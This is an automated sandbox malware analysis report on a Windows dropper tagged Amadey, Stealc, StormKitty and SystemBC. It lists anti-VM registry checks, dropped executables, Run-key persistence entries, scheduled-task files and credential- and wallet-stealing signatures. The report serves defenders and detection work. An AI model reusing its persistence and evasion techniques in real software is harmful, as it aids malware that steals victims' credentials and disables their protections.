Malware Analysis Report

2025-04-03 09:28

Sample ID 250306-bqz2batzdt
Target 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
SHA256 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
Tags
amadey gcleaner healer stealc stormkitty systembc 092155 trump defense_evasion discovery dropper execution loader persistence spyware stealer trojan collection evasion privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c

Threat Level: Known bad

The file 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer stealc stormkitty systembc 092155 trump defense_evasion discovery dropper execution loader persistence spyware stealer trojan collection evasion privilege_escalation

Amadey

GCleaner

Modifies Windows Defender DisableAntiSpyware settings

Stealc family

Systembc family

Modifies Windows Defender notification settings

Stealc

Modifies Windows Defender Real-time Protection settings

StormKitty

Amadey family

Healer family

Stormkitty family

Gcleaner family

StormKitty payload

Detects Healer an antivirus disabler dropper

SystemBC

Modifies Windows Defender TamperProtection settings

Healer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Identifies Wine through registry keys

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Reads user/profile data of local email clients

Windows security modification

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Program crash

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

outlook_win_path

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Modifies registry class

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Kills process with taskkill

Modifies Internet Explorer settings

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-06 01:21

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 01:21

Reported

2025-03-06 01:24

Platform

win7-20241023-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Stealc

stealer stealc

Stealc family

stealc

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\hvpde\vsigno.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\hvpde\vsigno.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\hvpde\vsigno.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\dafb180ffe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
N/A N/A C:\ProgramData\hvpde\vsigno.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\ProgramData\hvpde\vsigno.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\dafb180ffe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\dafb180ffe.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\cc8a07414f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\cc8a07414f.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\05bb15ddb8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\05bb15ddb8.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\f727984381.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\f727984381.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2424 set thread context of 18248 N/A C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe
PID 88132 set thread context of 117412 N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\dafb180ffe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
